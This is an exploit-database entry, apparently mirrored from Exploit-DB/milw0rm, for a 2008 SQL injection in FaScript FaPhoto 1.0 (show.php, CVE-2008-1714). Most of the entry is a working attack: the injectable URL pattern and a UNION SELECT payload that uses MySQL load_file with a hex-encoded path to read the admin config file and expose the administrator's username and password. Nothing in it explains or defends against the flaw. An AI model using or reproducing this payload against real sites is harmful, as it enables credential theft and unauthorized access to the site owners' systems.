Exploit FaScript FaPhoto 1.0 - 'show.php' SQL Injection

[Exploiter]

EDB-ID

5334

Проверка EDB

1. Пройдено

Автор

KHASHAYAR FEREIDANI

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-1714

Дата публикации

2008-04-01

#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://en.fascript.com/en.faphoto.zip                            #
#                                                                                   #
#Injection Adress :  http://Sitename/faname/show.php?id=<SqL Code>                  #
#                                                                                   #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php      #
#       You can open this file with load_file Function in mysql and see admin       #
#       Username and password in Page Source                                        #
#                                                                                   #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870            #
#                                                                                   #
#SQL Code for Read pconfig.php : 999999%27union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),2,3,4,5,6/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#                                 Tnx God                                           #
#####################################################################################

# milw0rm.com [2008-04-01]